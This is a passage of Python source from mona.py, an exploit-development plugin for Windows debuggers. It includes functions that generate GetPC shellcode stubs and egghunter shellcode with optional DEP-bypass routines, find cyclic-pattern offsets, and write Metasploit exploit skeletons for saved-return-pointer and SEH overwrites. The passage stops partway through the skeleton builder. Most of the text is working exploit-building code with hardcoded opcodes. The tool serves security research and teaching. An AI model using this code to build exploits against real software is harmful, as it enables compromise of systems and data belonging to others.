objarrayfile.write(output,arrayfile)
ignoremodules = False
dbg.logLines(output)
dbg.log("")
binfile = open(binfilename,"wb")
binfile.write(binarray)
binfile.close()
dbg.log("Done, wrote %d bytes to file %s" % (len(arraytable),arrayfile))
dbg.log("Binary output saved in %s" % binfilename)
return
#----- Read binary file, print 'nice' header -----#
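# procPrintHeader reads a binary file (-f) and emits it as ruby or python (-t) source that
# rebuilds the file header in a 'header' variable: runs of unicode text, repeated bytes, plain
# ascii and raw bytes are each written as separate, readable concatenations. The result is
# saved to header.txt.
# Illustrative usage (path is just an example): !mona header -f c:\tmp\input.mp3 -t python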
def procPrintHeader(args):
alltypes = ["ruby","rb","python","py"]
thistype = "ruby"
filename = ""
typewrong = False
stopnow = False
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
filename = args["f"]
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
if args["t"] in alltypes:
thistype = args["t"]
else:
typewrong = True
else:
typewrong = True
if typewrong:
dbg.log("Invalid type specified with option -t. Valid types are: %s" % alltypes,highlight=1)
stopnow = True
else:
if thistype == "rb":
thistype = "ruby"
if thistype == "py":
thistype = "python"
if filename == "":
dbg.log("Missing argument -f <source filename>",highlight=1)
stopnow = True
if stopnow:
return
filename = filename.replace("'","").replace('"',"")
content = ""
try:
file = open(filename,"rb")
content = file.read()
file.close()
except:
dbg.log("Unable to read file %s" % filename,highlight=1)
return
dbg.log("Read %d bytes from %s" % (len(content),filename))
dbg.log("Output type: %s" % thistype)
cnt = 0
linecnt = 0
output = ""
thisline = ""
max = len(content)
addchar = "<<"
if thistype == "python":
addchar = "+="
while cnt < max:
# first check for unicode
if cnt < max-1:
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
while cnt < max-1 and isAscii2(ord(content[cnt])) and ord(content[cnt+1]) == 0:
if content[cnt] == "\\":
thisline += "\\"
if content[cnt] == "\"":
thisline += "\\"
thisline += "%s\\x00" % content[cnt]
cnt += 2
if thiscnt != cnt:
output += thisline + "\"" + "\n"
linecnt += 1
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
# ascii repetitions
reps = 1
startval = content[cnt]
if isAscii(ord(content[cnt])):
while cnt < max-1:
if startval == content[cnt+1]:
reps += 1
cnt += 1
else:
break
if reps > 1:
if startval == "\\":
startval += "\\"
if startval == "\"":
startval = "\\" + "\""
output += thisline + startval + "\" * " + str(reps) + "\n"
cnt += 1
linecnt += 1
continue
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
# check for just ascii
while cnt < max and isAscii2(ord(content[cnt])):
if cnt < max-1 and ord(content[cnt+1]) == 0:
break
if content[cnt] == "\\":
thisline += "\\"
if content[cnt] == "\"":
thisline += "\\"
thisline += content[cnt]
cnt += 1
if thiscnt != cnt:
output += thisline + "\"" + "\n"
linecnt += 1
#check others : repetitions
if cnt < max:
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
while cnt < max:
if isAscii2(ord(content[cnt])):
break
if cnt < max-1 and isAscii2(ord(content[cnt])) and ord(content[cnt+1]) == 0:
break
#check repetitions
reps = 1
startval = ord(content[cnt])
while cnt < max-1:
if startval == ord(content[cnt+1]):
reps += 1
cnt += 1
else:
break
if reps > 1:
if len(thisline) > 12:
output += thisline + "\"" + "\n"
if linecnt == 0:
thisline = "header = \"\\x" + "%02x\" * %d" % (startval,reps)
else:
thisline = "header %s \"\\x" % addchar
thisline += "%02x\" * %d" % (startval,reps)
output += thisline + "\n"
thisline = "header %s \"" % addchar
linecnt += 1
else:
thisline += "\\x" + "%02x" % ord(content[cnt])
cnt += 1
if thiscnt != cnt:
if len(thisline) > 12:
output += thisline + "\"" + "\n"
linecnt += 1
global ignoremodules
ignoremodules = True
headerfilename="header.txt"
objheaderfile = MnLog(headerfilename)
headerfile = objheaderfile.reset()
objheaderfile.write(output,headerfile)
ignoremodules = False
if not silent:
dbg.log("-" * 30)
dbg.logLines(output)
dbg.log("-" * 30)
dbg.log("Wrote header to %s" % headerfile)
return
#----- Update -----#
def procUpdate(args):
"""
Function to update mona and optionally windbglib to the latest version
Arguments : none
Returns : new version of mona/windbglib (if available)
"""
updateproto = "https"
#if "http" in args:
# updateproto = "http"
#debugger version
imversion = __IMM__
#url
dbg.setStatusBar("Running update process...")
dbg.updateLog()
updateurl = "https://github.com/corelan/mona/raw/master/mona.py"
#if updateproto == "http":
# updateurl = "http://redmine.corelan.be/projects/mona/repository/git/revisions/master/raw/mona.py"
currentversion,currentrevision = getVersionInfo(inspect.stack()[0][1])
u = ""
try:
u = urllib.urlretrieve(updateurl)
newversion,newrevision = getVersionInfo(u[0])
if newversion != "" and newrevision != "":
dbg.log("[+] Version compare :")
dbg.log(" Current Version : %s, Current Revision : %s" % (currentversion,currentrevision))
dbg.log(" Latest Version : %s, Latest Revision : %s" % (newversion,newrevision))
else:
dbg.log("[-] Unable to check latest version (corrupted file ?), try again later",highlight=1)
return
except:
dbg.log("[-] Unable to check latest version (download error), run !mona update -http or try again later",highlight=1)
return
#check versions
doupdate = False
if newversion != "" and newrevision != "":
if currentversion != newversion:
doupdate = True
else:
if int(currentrevision) < int(newrevision):
doupdate = True
if doupdate:
dbg.log("[+] New version available",highlight=1)
dbg.log(" Updating to %s r%s" % (newversion,newrevision),highlight=1)
try:
shutil.copyfile(u[0],inspect.stack()[0][1])
dbg.log(" Done")
except:
dbg.log(" ** Unable to update mona.py",highlight=1)
currentversion,currentrevision = getVersionInfo(inspect.stack()[0][1])
dbg.log("[+] Current version : %s r%s" % (currentversion,currentrevision))
else:
dbg.log("[+] You are running the latest version")
# update windbglib if needed
if __DEBUGGERAPP__ == "WinDBG":
dbg.log("[+] Locating windbglib path")
paths = sys.path
filefound = False
libfile = ""
for ppath in paths:
libfile = ppath + "\\windbglib.py"
if os.path.isfile(libfile):
filefound=True
break
if not filefound:
dbg.log(" ** Unable to find windbglib.py ! **")
else:
dbg.log("[+] Checking if %s needs an update..." % libfile)
updateurl = "https://github.com/corelan/windbglib/raw/master/windbglib.py"
#if updateproto == "http":
# updateurl = updateproto + "://redmine.corelan.be/projects/windbglib/repository/raw/windbglib.py"
currentversion,currentrevision = getVersionInfo(libfile)
u = ""
try:
u = urllib.urlretrieve(updateurl)
newversion,newrevision = getVersionInfo(u[0])
if newversion != "" and newrevision != "":
dbg.log("[+] Version compare :")
dbg.log(" Current Version : %s, Current Revision : %s" % (currentversion,currentrevision))
dbg.log(" Latest Version : %s, Latest Revision : %s" % (newversion,newrevision))
else:
dbg.log("[-] Unable to check latest version (corrupted file ?), try again later",highlight=1)
return
except:
dbg.log("[-] Unable to check latest version (download error), run !mona update -http or try again later",highlight=1)
return
#check versions
doupdate = False
if newversion != "" and newrevision != "":
if currentversion != newversion:
doupdate = True
else:
if int(currentrevision) < int(newrevision):
doupdate = True
if doupdate:
dbg.log("[+] New version available",highlight=1)
dbg.log(" Updating to %s r%s" % (newversion,newrevision),highlight=1)
try:
shutil.copyfile(u[0],libfile)
dbg.log(" Done")
except:
dbg.log(" ** Unable to update windbglib.py",highlight=1)
currentversion,currentrevision = getVersionInfo(libfile)
dbg.log("[+] Current version : %s r%s" % (currentversion,currentrevision))
else:
dbg.log("[+] You are running the latest version")
dbg.setStatusBar("Done.")
return
#----- GetPC -----#
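# procgetPC prints three common GetPC stubs for the register chosen with -r: a jmp/call/pop
# sequence, the "call $+4" trick and an fstenv based variant, each ending with the found
# address in the requested register. Output is also written to getpc.txt.
# Illustrative usage: !mona getpc -r eax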
def procgetPC(args):
r32 = ""
output = ""
if "r" in args:
if type(args["r"]).__name__.lower() != "bool":
r32 = args["r"].lower()
if r32 == "" or not "r" in args:
dbg.log("Missing argument -r <register>",highlight=1)
return
opcodes = {}
opcodes["eax"] = "\\x58"
opcodes["ecx"] = "\\x59"
opcodes["edx"] = "\\x5a"
opcodes["ebx"] = "\\x5b"
opcodes["esp"] = "\\x5c"
opcodes["ebp"] = "\\x5d"
opcodes["esi"] = "\\x5e"
opcodes["edi"] = "\\x5f"
calls = {}
calls["eax"] = "\\xd0"
calls["ecx"] = "\\xd1"
calls["edx"] = "\\xd2"
calls["ebx"] = "\\xd3"
calls["esp"] = "\\xd4"
calls["ebp"] = "\\xd5"
calls["esi"] = "\\xd6"
calls["edi"] = "\\xd7"
output = "\n" + r32 + "| jmp short back:\n\"\\xeb\\x03" + opcodes[r32] + "\\xff" + calls[r32] + "\\xe8\\xf8\\xff\\xff\\xff\"\n"
output += r32 + "| call + 4:\n\"\\xe8\\xff\\xff\\xff\\xff\\xc3" + opcodes[r32] + "\"\n"
output += r32 + "| fstenv:\n\"\\xd9\\xeb\\x9b\\xd9\\x74\\x24\\xf4" + opcodes[r32] + "\"\n"
global ignoremodules
ignoremodules = True
getpcfilename="getpc.txt"
objgetpcfile = MnLog(getpcfilename)
getpcfile = objgetpcfile.reset()
objgetpcfile.write(output,getpcfile)
ignoremodules = False
dbg.logLines(output)
dbg.log("")
dbg.log("Wrote to file %s" % getpcfile)
return
#----- Egghunter -----#
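# procEgg builds an egghunter: a small searcher that scans process memory for the 4 byte tag
# (-t, default w00t) repeated twice and then jumps to the shellcode placed behind it. -wow64
# emits the wow64-compatible variant, -c (together with -f <shellcode file>) appends a
# checksum routine (sum of all payload bytes, low byte compared against the value stored after
# the payload), -startreg seeds the search address, and the -depmethod/-depreg/-depdest/-depsize
# options bolt a DEP bypass stub (VirtualProtect or copy based) onto the hunter.
# Illustrative usage: !mona egghunter -t w00t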
def procEgg(args):
filename = ""
egg = "w00t"
usechecksum = False
usewow64 = False
useboth = False
egg_size = 0
checksumbyte = ""
extratext = ""
global silent
oldsilent = silent
silent = True
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
filename = args["f"]
filename = filename.replace("'", "").replace("\"", "")
#Set egg
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
egg = args["t"]
if "wow64" in args:
usewow64 = True
# placeholder for later
if "both" in args:
useboth = True
if len(egg) != 4:
egg = 'w00t'
dbg.log("[+] Egg set to %s" % egg)
if "c" in args:
if filename != "":
usechecksum = True
dbg.log("[+] Hunter will include checksum routine")
else:
dbg.log("Option -c only works in conjunction with -f <filename>",highlight=1)
return
startreg = ""
if "startreg" in args:
if isReg(args["startreg"]):
startreg = args["startreg"].lower()
dbg.log("[+] Egg will start search at %s" % startreg)
depmethods = ["virtualprotect","copy","copy_size"]
depreg = "esi"
depsize = 0
freeregs = [ "ebx","ecx","ebp","esi" ]
regsx = {}
# 0 : mov xX
# 1 : push xX
# 2 : mov xL
# 3 : mov xH
#
regsx["eax"] = ["\x66\xb8","\x66\x50","\xb0","\xb4"]
regsx["ebx"] = ["\x66\xbb","\x66\x53","\xb3","\xb7"]
regsx["ecx"] = ["\x66\xb9","\x66\x51","\xb1","\xb5"]
regsx["edx"] = ["\x66\xba","\x66\x52","\xb2","\xb6"]
regsx["esi"] = ["\x66\xbe","\x66\x56"]
regsx["edi"] = ["\x66\xbf","\x66\x57"]
regsx["ebp"] = ["\x66\xbd","\x66\x55"]
regsx["esp"] = ["\x66\xbc","\x66\x54"]
addreg = {}
addreg["eax"] = "\x83\xc0"
addreg["ebx"] = "\x83\xc3"
addreg["ecx"] = "\x83\xc1"
addreg["edx"] = "\x83\xc2"
addreg["esi"] = "\x83\xc6"
addreg["edi"] = "\x83\xc7"
addreg["ebp"] = "\x83\xc5"
addreg["esp"] = "\x83\xc4"
depdest = ""
depmethod = ""
getpointer = ""
getsize = ""
getpc = ""
jmppayload = "\xff\xe7"
if "depmethod" in args:
if args["depmethod"].lower() in depmethods:
depmethod = args["depmethod"].lower()
dbg.log("[+] Hunter will include routine to bypass DEP on found shellcode")
# other DEP related arguments ?
# depreg
# depdest
# depsize
if "depreg" in args:
if isReg(args["depreg"]):
depreg = args["depreg"].lower()
if "depdest" in args:
if isReg(args["depdest"]):
depdest = args["depdest"].lower()
if "depsize" in args:
try:
depsize = int(args["depsize"])
except:
dbg.log(" ** Invalid depsize",highlight=1)
return
#read payload file
data = ""
if filename != "":
try:
f = open(filename, "rb")
data = f.read()
f.close()
dbg.log("[+] Read payload file (%d bytes)" % len(data))
except:
dbg.log("Unable to read file %s" %filename, highlight=1)
return
#let's start
egghunter = ""
if not usewow64:
#Basic version of egghunter
dbg.log("[+] Generating traditional 32bit egghunter code")
egghunter = ""
egghunter += (
"\x66\x81\xca\xff\x0f"+ #or dx,0xfff
"\x42"+ #INC EDX
"\x52" #push edx
"\x6a\x02" #push 2 (NtAccessCheckAndAuditAlarm syscall)
"\x58" #pop eax
"\xcd\x2e" #int 0x2e
"\x3c\x05" #cmp al,5
"\x5a" #pop edx
"\x74\xef" #je "or dx,0xfff"
"\xb8"+egg+ #mov eax, egg
"\x8b\xfa" #mov edi,edx
"\xaf" #scasd
"\x75\xea" #jne "inc edx"
"\xaf" #scasd
"\x75\xe7" #jne "inc edx"
)
if usewow64:
egghunter = ""
egghunter += (
# 64 stub needed before loop
"\x31\xdb" #xor ebx,ebx
"\x53" #push ebx
"\x53" #push ebx
"\x53" #push ebx
"\x53" #push ebx
"\xb3\xc0" #mov bl,0xc0
# 64 Loop
"\x66\x81\xCA\xFF\x0F" #OR DX,0FFF
"\x42" #INC EDX
"\x52" #PUSH EDX
"\x6A\x26" #PUSH 26
"\x58" #POP EAX
"\x33\xC9" #XOR ECX,ECX
"\x8B\xD4" #MOV EDX,ESP
"\x64\xff\x13" #CALL DWORD PTR FS:[ebx]
"\x5e" #POP ESI
"\x5a" #POP EDX
"\x3C\x05" #CMP AL,5
"\x74\xe9" #JE SHORT
"\xB8"+egg+ #MOV EAX,74303077 w00t
"\x8B\xFA" #MOV EDI,EDX
"\xAF" #SCAS DWORD PTR ES:[EDI]
"\x75\xe4" #JNZ "inc edx"
"\xAF" #SCAS DWORD PTR ES:[EDI]
"\x75\xe1" #JNZ "inc edx"
)
if usechecksum:
dbg.log("[+] Generating checksum routine")
extratext = "+ checksum routine"
egg_size = ""
if len(data) < 256:
cmp_reg = "\x80\xf9" #cmp cl,value
egg_size = hex2bin("%x" % len(data))
offset1 = "\xf7"
offset2 = "\xd3"
elif len(data) < 65536:
cmp_reg = "\x66\x81\xf9" #cmp cx,value
#avoid nulls
egg_size_normal = "%04X" % len(data)
while egg_size_normal[0:2] == "00" or egg_size_normal[2:4] == "00":
data += "\x90"
egg_size_normal = "%04X" % len(data)
egg_size = hex2bin(egg_size_normal[2:4]) + hex2bin(egg_size_normal[0:2])
offset1 = "\xf5"
offset2 = "\xd1"
else:
dbg.log("Cannot use checksum code with this payload size (way too big)",highlight=1)
return
sum = 0
for byte in data:
sum += ord(byte)
sumstr= toHex(sum)
checksumbyte = sumstr[len(sumstr)-2:len(sumstr)]
egghunter += (
"\x51" #push ecx
"\x31\xc9" #xor ecx,ecx
"\x31\xc0" #xor eax,eax
"\x02\x04\x0f" #add al,byte [edi+ecx]
"\x41"+ #inc ecx
cmp_reg + egg_size + #cmp cx/cl, value
"\x75" + offset1 + #jnz "add al,byte [edi+ecx]
"\x3a\x04\x39" + #cmp al,byte [edi+ecx]
"\x59" + #pop ecx
"\x75" + offset2 #jnz "inc edx"
)
#dep bypass ?
if depmethod != "":
dbg.log("[+] Generating dep bypass routine")
if not depreg in freeregs:
getpointer += "mov " + freeregs[0] +"," + depreg + "#"
depreg = freeregs[0]
freeregs.remove(depreg)
if depmethod == "copy" or depmethod == "copy_size":
if depdest != "":
if not depdest in freeregs:
getpointer += "mov " + freeregs[0] + "," + depdest + "#"
depdest = freeregs[0]
else:
getpc = "\xd9\xee" # fldz
getpc += "\xd9\x74\xe4\xf4" # fstenv [esp-0c]
depdest = freeregs[0]
getpc += hex2bin(assemble("pop "+depdest))
freeregs.remove(depdest)
sizereg = freeregs[0]
if depsize == 0:
# set depsize to payload * 2 if we are using a file
depsize = len(data) * 2
if depmethod == "copy_size":
depsize = len(data)
if depsize == 0:
dbg.log("** Please specify a valid -depsize when you are not using -f **",highlight=1)
return
else:
if depsize <= 127:
#simply push it to the stack
getsize = "\x6a" + hex2bin("\\x" + toHexByte(depsize))
else:
#can we do it with 16bit reg, no nulls ?
if depsize <= 65535:
sizeparam = toHex(depsize)[4:8]
getsize = hex2bin(assemble("xor "+sizereg+","+sizereg))
if not (sizeparam[0:2] == "00" or sizeparam[2:4] == "00"):
#no nulls, hooray, write to xX
getsize += regsx[sizereg][0]+hex2bin("\\x" + sizeparam[2:4] + "\\x" + sizeparam[0:2])
else:
# write the non null if we can
if len(regsx[sizereg]) > 2:
if not (sizeparam[0:2] == "00"):
# write to xH
getsize += regsx[sizereg][3] + hex2bin("\\x" + sizeparam[0:2])
if not (sizeparam[2:4] == "00"):
# write to xL
getsize += regsx[sizereg][2] + hex2bin("\\x" + sizeparam[2:4])
else:
#we have to write the full value to sizereg
blockcnt = 0
vpsize = 0
blocksize = depsize
while blocksize >= 127:
blocksize = blocksize / 2
blockcnt += 1
if blockcnt > 0:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(blocksize))
vpsize = blocksize
depblockcnt = 0
while depblockcnt < blockcnt:
getsize += hex2bin(assemble("add "+sizereg+","+sizereg))
vpsize += vpsize
depblockcnt += 1
delta = depsize - vpsize
if delta > 0:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(delta))
else:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(depsize))
# finally push
getsize += hex2bin(assemble("push "+ sizereg))
else:
dbg.log("** Shellcode size (depsize) is too big",highlight=1)
return
#finish it off
if depmethod == "virtualprotect":
jmppayload = "\x54\x6a\x40"
jmppayload += getsize
jmppayload += hex2bin(assemble("#push edi#push edi#push "+depreg+"#ret"))
elif depmethod == "copy":
        jmppayload = hex2bin(assemble("push edi#push "+depdest+"#push "+depdest+"#push "+depreg+"#mov edi,"+depdest+"#ret"))
elif depmethod == "copy_size":
jmppayload += getsize
jmppayload += hex2bin(assemble("push edi#push "+depdest+"#push " + depdest + "#push "+depreg+"#mov edi,"+depdest+"#ret"))
#jmp to payload
egghunter += getpc
egghunter += jmppayload
startat = ""
skip = ""
#start at a certain reg ?
if startreg != "":
if startreg != "edx":
startat = hex2bin(assemble("mov edx," + startreg))
skip = "\xeb\x05"
egghunter = skip + egghunter
#pickup pointer for DEP bypass ?
egghunter = hex2bin(assemble(getpointer)) + egghunter
egghunter = startat + egghunter
silent = oldsilent
#Convert binary to printable hex format
egghunter_hex = toniceHex(egghunter.strip().replace(" ",""),16)
global ignoremodules
ignoremodules = True
hunterfilename="egghunter.txt"
objegghunterfile = MnLog(hunterfilename)
egghunterfile = objegghunterfile.reset()
dbg.log("[+] Egghunter %s (%d bytes): " % (extratext,len(egghunter.strip().replace(" ",""))))
dbg.logLines("%s" % egghunter_hex)
objegghunterfile.write("Egghunter " + extratext + ", tag " + egg + " : ",egghunterfile)
objegghunterfile.write(egghunter_hex,egghunterfile)
if filename == "":
objegghunterfile.write("Put this tag in front of your shellcode : " + egg + egg,egghunterfile)
else:
dbg.log("[+] Shellcode, with tag : ")
block = "\"" + egg + egg + "\"\n"
cnt = 0
flip = 1
thisline = "\""
while cnt < len(data):
thisline += "\\x%s" % toHexByte(ord(data[cnt]))
if (flip == 32) or (cnt == len(data)-1):
if cnt == len(data)-1 and checksumbyte != "":
thisline += "\\x%s" % checksumbyte
thisline += "\""
flip = 0
block += thisline
block += "\n"
thisline = "\""
cnt += 1
flip += 1
dbg.logLines(block)
objegghunterfile.write("\nShellcode, with tag :\n",egghunterfile)
objegghunterfile.write(block,egghunterfile)
ignoremodules = False
return
#----- Find MSP ------ #
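# procFindMSP delegates to goFindMSP(), which scans registers, SEH records, the stack and
# memory for fragments of a Metasploit-style cyclic pattern and reports the offsets;
# -distance widens the area searched around the located pattern.
# Illustrative usage: !mona findmsp -distance 500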
def procFindMSP(args):
distance = 0
if "distance" in args:
try:
distance = int(args["distance"])
except:
distance = 0
if distance < 0:
dbg.log("** Please provide a positive number as distance",highlight=1)
return
mspresults = {}
mspresults = goFindMSP(distance,args)
return
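# procSuggest combines the goFindMSP() results with pointer searches to propose an exploit
# skeleton: for a direct EIP overwrite it looks for a register pointing into the buffer plus a
# matching jmp/call pointer, for SEH overwrites it picks a pop/pop/ret, and in both cases it
# writes a Metasploit module skeleton (exploit.rb / exploit_seh.rb) with the Targets and
# exploit sections filled in. -t selects the skeleton type and its argument.
# Illustrative usage: !mona suggest -t tcpclient:21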
def procSuggest(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
isEIP = False
isSEH = False
isEIPUnicode = False
isSEHUnicode = False
initialoffsetSEH = 0
initialoffsetEIP = 0
shellcodesizeSEH = 0
shellcodesizeEIP = 0
nullsallowed = True
global ignoremodules
global noheader
global ptr_to_get
global silent
global ptr_counter
targetstr = ""
exploitstr = ""
originalauthor = ""
url = ""
#are we attached to an application ?
if dbg.getDebuggedPid() == 0:
dbg.log("** You don't seem to be attached to an application ! **",highlight=1)
return
exploittype = ""
skeletonarg = ""
usecliargs = False
validstypes ={}
validstypes["tcpclient"] = "network client (tcp)"
validstypes["udpclient"] = "network client (udp)"
validstypes["fileformat"] = "fileformat"
exploittypes = [ "fileformat","network client (tcp)","network client (udp)" ]
if __DEBUGGERAPP__ == "WinDBG" or "t" in args:
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
skeltype = args["t"].lower()
skelparts = skeltype.split(":")
if skelparts[0] in validstypes:
exploittype = validstypes[skelparts[0]]
if len(skelparts) > 1:
skeletonarg = skelparts[1]
else:
dbg.log(" ** Please specify the skeleton type AND an argument. **")
return
usecliargs = True
else:
dbg.log(" ** Please specify a valid skeleton type and an argument. **")
return
else:
dbg.log(" ** Please specify a skeletontype using -t **",highlight=1)
return
else:
dbg.log(" ** Please specify a skeletontype using -t **",highlight=1)
return
mspresults = {}
mspresults = goFindMSP(100,args)
#create metasploit skeleton file
exploitfilename="exploit.rb"
objexploitfile = MnLog(exploitfilename)
#ptr_to_get = 5
noheader = True
ignoremodules = True
exploitfile = objexploitfile.reset()
ignoremodules = False
noheader = False
dbg.log(" ")
dbg.log("[+] Preparing payload...")
dbg.log(" ")
dbg.updateLog()
#what options do we have ?
# 0 : pointer
# 1 : offset
# 2 : type
if "registers" in mspresults:
for reg in mspresults["registers"]:
if reg.upper() == "EIP":
isEIP = True
eipval = mspresults["registers"][reg][0]
ptrx = MnPointer(eipval)
initialoffsetEIP = mspresults["registers"][reg][1]
# 0 : pointer
# 1 : offset
# 2 : type
# 3 : size
if "seh" in mspresults:
if len(mspresults["seh"]) > 0:
isSEH = True
for seh in mspresults["seh"]:
if mspresults["seh"][seh][2] == "unicode":
isSEHUnicode = True
if not isSEHUnicode:
initialoffsetSEH = mspresults["seh"][seh][1]
else:
initialoffsetSEH = mspresults["seh"][seh][1]
shellcodesizeSEH = mspresults["seh"][seh][3]
if isSEH:
ignoremodules = True
noheader = True
exploitfilename_seh="exploit_seh.rb"
objexploitfile_seh = MnLog(exploitfilename_seh)
exploitfile_seh = objexploitfile_seh.reset()
ignoremodules = False
noheader = False
# start building exploit structure
if not isEIP and not isSEH:
dbg.log(" ** Unable to suggest anything useful. You don't seem to control EIP or SEH ** ",highlight=1)
return
# ask for type of module
if not usecliargs:
dbg.log(" ** Please select a skeleton exploit type from the dropdown list **",highlight=1)
exploittype = dbg.comboBox("Select msf exploit skeleton to build :", exploittypes).lower().strip()
if not exploittype in exploittypes:
dbg.log("Boo - invalid exploit type, try again !",highlight=1)
return
portnr = 0
extension = ""
if exploittype.find("network") > -1:
if usecliargs:
portnr = skeletonarg
else:
portnr = dbg.inputBox("Remote port number : ")
try:
portnr = int(portnr)
except:
portnr = 0
if exploittype.find("fileformat") > -1:
if usecliargs:
extension = skeletonarg
else:
extension = dbg.inputBox("File extension :")
extension = extension.replace("'","").replace('"',"").replace("\n","").replace("\r","")
if not extension.startswith("."):
extension = "." + extension
dbg.createLogWindow()
dbg.updateLog()
url = ""
badchars = ""
if "badchars" in criteria:
badchars = criteria["badchars"]
if "nonull" in criteria:
if not '\x00' in badchars:
badchars += '\x00'
skeletonheader,skeletoninit,skeletoninit2 = getSkeletonHeader(exploittype,portnr,extension,url,badchars)
regsto = ""
if isEIP:
dbg.log("[+] Attempting to create payload for saved return pointer overwrite...")
#where can we jump to - get the register that has the largest buffer size
largestreg = ""
largestsize = 0
offsetreg = 0
regptr = 0
# register_to
# 0 : pointer
# 1 : offset
# 2 : size
# 3 : type
eipcriteria = criteria
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
jmp_pointers = {}
jmppointer = 0
instrinfo = ""
if isEIPUnicode:
eipcriteria["unicode"] = True
eipcriteria["nonull"] = False
if "registers_to" in mspresults:
for reg in mspresults["registers_to"]:
regsto += reg+","
thissize = mspresults["registers_to"][reg][2]
thisreg = reg
thisoffset = mspresults["registers_to"][reg][1]
thisregptr = mspresults["registers_to"][reg][0]
if thisoffset < initialoffsetEIP:
#fix the size, which will end at offset to EIP
thissize = initialoffsetEIP - thisoffset
if thissize > largestsize:
# can we find a jmp to that reg ?
silent = True
ptr_counter = 0
ptr_to_get = 1
jmp_pointers = findJMP(modulecriteria,eipcriteria,reg.lower())
if len( jmp_pointers ) == 0:
ptr_counter = 0
ptr_to_get = 1
modulecriteria["os"] = True
jmp_pointers = findJMP(modulecriteria,eipcriteria,reg.lower())
modulecriteria["os"] = False
if len( jmp_pointers ) > 0:
largestsize = thissize
largestreg = thisreg
offsetreg = thisoffset
regptr = thisregptr
silent = False
regsto = regsto.rstrip(",")
if largestreg == "":
dbg.log(" Payload is referenced by at least one register (%s), but I couldn't seem to find" % regsto,highlight=1)
dbg.log(" a way to jump to that register",highlight=1)
else:
#build exploit
for ptrtype in jmp_pointers:
jmppointer = jmp_pointers[ptrtype][0]
instrinfo = ptrtype
break
ptrx = MnPointer(jmppointer)
modname = ptrx.belongsTo()
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
if not isEIPUnicode:
targetstr += " 'Ret' => 0x" + toHex(jmppointer) + ", # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetEIP) + "\n"
else:
origptr = toHex(jmppointer)
#real unicode ?
unicodeptr = ""
transforminfo = ""
if origptr[0] == "0" and origptr[1] == "0" and origptr[4] == "0" and origptr[5] == "0":
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
else:
#transform
transform = UnicodeTransformInfo(origptr)
transformparts = transform.split(",")
transformsubparts = transformparts[0].split(" ")
origptr = transformsubparts[len(transformsubparts)-1]
transforminfo = " #unicode transformed to 0x" + toHex(jmppointer)
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
targetstr += " 'Ret' => " + unicodeptr + "," + transforminfo + "# " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetEIP) + " #Unicode\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
if exploittype.find("tcp") > -1:
exploitstr += "\n connect\n\n"
elif exploittype.find("udp") > -1:
exploitstr += "\n connect_udp\n\n"
if initialoffsetEIP < offsetreg:
# eip is before shellcode
exploitstr += " buffer = rand_text(target['Offset']) \n"
if not isEIPUnicode:
exploitstr += " buffer << [target.ret].pack('V') \n"
else:
exploitstr += " buffer << target['Ret'] #Unicode friendly jump\n\n"
if offsetreg > initialoffsetEIP+2:
if not isEIPUnicode:
if (offsetreg - initialoffsetEIP - 4) > 0:
exploitstr += " buffer << rand_text(" + str(offsetreg - initialoffsetEIP - 4) + ") #junk\n"
else:
if ((offsetreg - initialoffsetEIP - 4)/2) > 0:
exploitstr += " buffer << rand_text(" + str((offsetreg - initialoffsetEIP - 4)/2) + ") #unicode junk\n"
stackadjust = 0
if largestreg.upper() == "ESP":
if not isEIPUnicode:
exploitstr += " buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, 'add esp,-1500').encode_string # avoid GetPC shellcode corruption\n"
stackadjust = 6
exploitstr += " buffer << payload.encoded #max " + str(largestsize - stackadjust) + " bytes\n"
if isEIPUnicode:
exploitstr += " # Metasploit requires double encoding for unicode : Use alpha_xxxx encoder in the payload section\n"
exploitstr += " # and then manually encode with unicode inside the exploit section :\n\n"
exploitstr += " enc = framework.encoders.create('x86/unicode_mixed')\n\n"
exploitstr += " register_to_align_to = '" + largestreg.upper() + "'\n\n"
if largestreg.upper() == "ESP":
exploitstr += " # Note : since you are using ESP as bufferregister, make sure EBP points to a writeable address !\n"
exploitstr += " # or patch the unicode decoder yourself\n"
exploitstr += " enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n\n"
exploitstr += " unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n"
exploitstr += " buffer << unicodepayload"
else:
# EIP -> jump to location before EIP
beforeEIP = initialoffsetEIP - offsetreg
if beforeEIP > 0:
if offsetreg > 0:
exploitstr += " buffer = rand_text(" + str(offsetreg)+") #offset to " + largestreg+"\n"
exploitstr += " buffer << payload.encoded #max " + str(initialoffsetEIP - offsetreg) + " bytes\n"
exploitstr += " buffer << rand_text(target['Offset'] - payload.encoded.length)\n"
exploitstr += " buffer << [target.ret].pack('V') \n"
else:
exploitstr += " buffer = payload.encoded #max " + str(initialoffsetEIP - offsetreg) + " bytes\n"
exploitstr += " buffer << rand_text(target['Offset'] - payload.encoded.length)\n"
exploitstr += " buffer << [target.ret].pack('V') \n"
